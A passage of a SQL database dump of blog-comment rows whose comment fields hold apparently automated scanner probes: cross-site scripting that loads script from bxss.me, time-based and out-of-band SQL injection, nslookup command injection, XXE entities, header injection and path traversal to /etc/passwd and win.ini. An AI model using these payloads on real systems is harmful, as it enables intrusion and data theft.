\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\', 0, '2017-10-24 18:31:24'),
(263, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF/web.xml', 0, '2017-10-24 18:31:25'),
(264, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF\\web.xml', 0, '2017-10-24 18:31:26'),
(265, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;S9LR(9062)&lt;/ScRiPt&gt;', 0, '2017-10-24 18:31:41'),
(266, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;()&amp;%&lt;acx&gt;&lt;ScRiPt &gt;S9LR(9754)&lt;/ScRiPt&gt;', 0, '2017-10-24 18:31:42'),
(267, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '19280097', 0, '2017-10-24 18:31:42'),
(268, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1acuSburwpG9rK', 0, '2017-10-25 10:06:35'),
(269, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'response.write(9890975*9335437)', 0, '2017-10-27 14:24:09'),
(270, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'+response.write(9890975*9335437)+\'', 0, '2017-10-27 14:24:11'),
(271, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&quot;+response.write(9890975*9335437)+&quot;', 0, '2017-10-27 14:24:11'),
(272, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '9VNsetjV', 0, '2017-10-27 14:24:14'),
(273, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;/script&gt;&lt;svg/onload=\'+/&quot;/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\\/s?u=002626&amp;r=33990-506&amp;h=33990-caaaa-2&amp;/).slice(2),document.documentElement.appendChild(s))//\'&gt;', 0, '2017-10-27 14:24:21'),
(274, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&gt;&quot;&gt;&lt;script src=http://bxss.me/s?u=002626&amp;r=33990-509&amp;h=33990-caaaa-1&gt;&lt;/script&gt;&lt;tcpdf method=&quot;addTTFFont&quot; params=&quot;%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,002626,33990-509,33990,caaaa,%22%5D&quot;/&gt;', 0, '2017-10-27 14:24:23'),
(275, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${9999761+9999435}', 0, '2017-10-27 14:24:29'),
(276, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'bcc:002626.33990-517.33990.caaaa.1@bxss.me', 0, '2017-10-27 14:24:33'),
(277, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'to@example.com&gt;\r\nbcc:002626.33990-519.33990.caaaa.1@bxss.me', 0, '2017-10-27 14:24:35'),
(278, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg', 0, '2017-10-27 14:24:39'),
(279, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'set|set&amp;set', 0, '2017-10-27 14:24:39'),
(280, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1some_inexistent_file_with_long_name\\0.jpg', 0, '2017-10-27 14:24:40'),
(281, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'Http://testasp.vulnweb.com/t/fit.txt', 0, '2017-10-27 14:24:40'),
(282, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://testasp.vulnweb.com/t/fit.txt?.jpg', 0, '2017-10-27 14:24:41'),
(283, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'testasp.vulnweb.com', 0, '2017-10-27 14:24:41'),
(284, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '$(nslookup dns.ce.\\002626.33990-526.33990.caaaa.\\1.bxss.me)', 0, '2017-10-27 14:24:42'),
(285, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&amp;nslookup dns.ce.\\002626.33990-531.33990.caaaa.\\1.bxss.me&amp;\'\\&quot;`0&amp;nslookup dns.ce.\\002626.33990-531.33990.caaaa.\\1.bxss.me&amp;`\'', 0, '2017-10-27 14:24:42'),
(286, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '', 0, '2017-10-27 14:24:42'),
(287, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&amp;n974065=v983857', 0, '2017-10-27 14:24:43'),
(288, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '', 0, '2017-10-27 14:24:47'),
(289, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ')', 0, '2017-10-27 14:24:47'),
(290, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '!(()&amp;&amp;!|*|*|', 0, '2017-10-27 14:24:48'),
(291, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;()', 0, '2017-10-27 14:24:48'),
(292, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '^(#$!@#$)(()))******', 0, '2017-10-27 14:24:48'),
(293, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://testasp.vulnweb.com/t/xss.html?%00.jpg', 0, '2017-10-27 14:24:50'),
(294, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'http://hiteYlOE9TQ2F.bxss.me/', 0, '2017-10-27 14:24:52'),
(295, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ';print(md5(acunetix_wvs_security_test));', 0, '2017-10-27 14:24:53'),
(296, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\';print(md5(acunetix_wvs_security_test));$a=\'', 0, '2017-10-27 14:24:53'),
(297, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&quot;;print(md5(acunetix_wvs_security_test));$a=&quot;', 0, '2017-10-27 14:24:54'),
(298, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${@print(md5(acunetix_wvs_security_test))}', 0, '2017-10-27 14:24:54'),
(299, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php', 0, '2017-10-27 14:24:54'),
(300, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '${@print(md5(acunetix_wvs_security_test))}\\', 0, '2017-10-27 14:24:54'),
(301, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))', 0, '2017-10-27 14:24:55'),
(302, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php', 0, '2017-10-27 14:24:55'),
(303, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'index.php/.', 0, '2017-10-27 14:24:55'),
(304, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\r\n&lt;!DOCTYPE acunetix [\r\n  &lt;!ENTITY acunetixent SYSTEM &quot;http://hitslGNNkzXs6.bxss.me/&quot;&gt;\r\n]&gt;\r\n&lt;xxx&gt;&amp;acunetixent;&lt;/xxx&gt;', 0, '2017-10-27 14:24:56'),
(305, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\r\n  &lt;!DOCTYPE roottag PUBLIC &quot;-//VSR//PENTEST//EN&quot; &quot;http://hittKF0JiXDp2.bxss.me/&quot;&gt;\r\n&lt;roottag&gt;acunetix&lt;/roottag&gt;', 0, '2017-10-27 14:24:57'),
(306, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;xi:include href=&quot;http://hitQE8J6Puxnp.bxss.me/&quot; parse=&quot;text&quot;/&gt;', 0, '2017-10-27 14:24:58'),
(307, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\r\n&lt;!DOCTYPE foo [\r\n&lt;!ELEMENT foo ANY &gt;\r\n&lt;!ENTITY % xxe SYSTEM &quot;http://hitPgFqWVtGPA.bxss.me/&quot;&gt;\r\n%xxe;\r\n]&gt;', 0, '2017-10-27 14:24:59'),
(308, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/www.vulnweb.com', 0, '2017-10-27 14:25:00'),
(309, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'&quot;', 0, '2017-10-27 14:25:00'),
(310, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;\r\n&lt;!DOCTYPE body SYSTEM &quot;http://hitwnqYkeZ1ka.bxss.me/&quot;&gt;\r\n&lt;body&gt;&lt;method&gt;test&lt;/method&gt;&lt;/body&gt;', 0, '2017-10-27 14:25:00'),
(311, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '&lt;!--', 0, '2017-10-27 14:25:01'),
(312, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1', 0, '2017-10-27 14:25:02'),
(313, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\'&quot;', 0, '2017-10-27 14:25:02'),
(314, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1', 0, '2017-10-27 14:25:03'),
(315, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\\', 0, '2017-10-27 14:25:03'),
(316, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'RNIaQokJ', 0, '2017-10-27 14:25:04'),
(317, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1 OR 2+595-595-1=0+0+0+1 --', 0, '2017-10-27 14:25:04'),
(318, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '@@Pet8p', 0, '2017-10-27 14:25:05'),
(319, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1 OR 2+187-187-1=0+0+0+1', 0, '2017-10-27 14:25:05'),
(320, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1\' OR 2+124-124-1=0+0+0+1 --', 0, '2017-10-27 14:25:05');
INSERT INTO `journal3_blog_comments` (`comment_id`, `parent_id`, `post_id`, `customer_id`, `author_id`, `name`, `email`, `website`, `comment`, `status`, `date`) VALUES
(321, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'JyI=', 0, '2017-10-27 14:25:05'),
(322, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1\' OR 2+258-258-1=0+0+0+1 or \'0BhlsVFn\'=\'', 0, '2017-10-27 14:25:06'),
(323, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1&quot; OR 2+230-230-1=0+0+0+1 --', 0, '2017-10-27 14:25:07'),
(324, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'if(now()=sysdate(),sleep(6),0)/*\'XOR(if(now()=sysdate(),sleep(6),0))OR\'&quot;XOR(if(now()=sysdate(),sleep(6),0))OR&quot;*/', 0, '2017-10-27 14:25:07'),
(325, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '(select(0)from(select(sleep(6)))v)/*\'+(select(0)from(select(sleep(6)))v)+\'&quot;+(select(0)from(select(sleep(6)))v)+&quot;*/', 0, '2017-10-27 14:25:08'),
(326, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1; waitfor delay \'0:0:6\' --', 0, '2017-10-27 14:25:09'),
(327, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1); waitfor delay \'0:0:6\' --', 0, '2017-10-27 14:25:10'),
(328, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1 waitfor delay \'0:0:9\' --', 0, '2017-10-27 14:25:11'),
(329, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'YCwVOTTn\'; waitfor delay \'0:0:9\' --', 0, '2017-10-27 14:25:12'),
(330, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1;select pg_sleep(9); --', 0, '2017-10-27 14:25:13'),
(331, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1);select pg_sleep(9); --', 0, '2017-10-27 14:25:14'),
(332, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '-1));select pg_sleep(9); --', 0, '2017-10-27 14:25:15'),
(333, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WhTmwIKF\';select pg_sleep(3); --', 0, '2017-10-27 14:25:16'),
(334, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'MV8WSCHn\');select pg_sleep(3); --', 0, '2017-10-27 14:25:18'),
(335, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'Ofo3o7rO\'));select pg_sleep(3); --', 0, '2017-10-27 14:25:19'),
(336, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../etc/passwd', 0, '2017-10-27 14:25:20'),
(337, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.002626.33990-556.33990.caaaa.1.bxss\'||\'.me\')', 0, '2017-10-27 14:25:25'),
(338, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../../../../../../proc/version', 0, '2017-10-27 14:25:25'),
(339, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg', 0, '2017-10-27 14:25:31'),
(340, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '\'||UTL_INADDR.get_host_address(\'dns.\'||\'sqli.002626.33990-559.33990.caaaa.1.bxss\'||\'.me\')||\'', 0, '2017-10-27 14:25:31'),
(341, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../etc/passwd\\0.jpg', 0, '2017-10-27 14:25:32'),
(342, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1;copy (select \'\') to program \'nslookup dns.sqli.\\002626.33990-561.33990.caaaa.\\1.bxss.me\'', 0, '2017-10-27 14:25:32'),
(343, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg', 0, '2017-10-27 14:25:32'),
(344, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/../..//../..//../..//../..//../..//etc/passwd\\0.jpg', 0, '2017-10-27 14:25:33'),
(345, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd', 0, '2017-10-27 14:25:34'),
(346, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/etc/passwd', 0, '2017-10-27 14:25:35'),
(347, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '%2fetc%2fpasswd', 0, '2017-10-27 14:25:36'),
(348, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/.././.././.././.././.././.././.././../etc/./passwd%00', 0, '2017-10-27 14:25:37'),
(349, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd', 0, '2017-10-27 14:25:38'),
(350, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd', 0, '2017-10-27 14:25:39'),
(351, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '1\';copy (select \'\') to program \'nslookup dns.sqli.\\002626.33990-566.33990.caaaa.\\1.bxss.me', 0, '2017-10-27 14:25:39'),
(352, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '298\'', 0, '2017-10-27 14:25:40'),
(353, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.', 0, '2017-10-27 14:25:41'),
(354, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'file:///etc/passwd', 0, '2017-10-27 14:25:42'),
(355, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/\\../\\../\\../\\../\\../\\../\\../etc/passwd', 0, '2017-10-27 14:25:43'),
(356, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF/web.xml', 0, '2017-10-27 14:25:43'),
(357, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/WEB-INF/web.xml', 0, '2017-10-27 14:25:44'),
(358, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'WEB-INF\\web.xml', 0, '2017-10-27 14:25:45'),
(359, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../windows/win.ini', 0, '2017-10-27 14:25:45'),
(360, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts', 0, '2017-10-27 14:25:46'),
(361, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../../../../../../../../../../windows/win.ini\\0.jpg', 0, '2017-10-27 14:25:47'),
(362, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '................windowswin.ini', 0, '2017-10-27 14:25:49'),
(363, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini', 0, '2017-10-27 14:25:50'),
(364, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini', 0, '2017-10-27 14:25:50'),
(365, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini', 0, '2017-10-27 14:25:51'),
(366, 0, 1, 0, 0, 'e', 'sample@email.tst', 'e', '../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini', 0, '2017-10-27 14:25:51'),
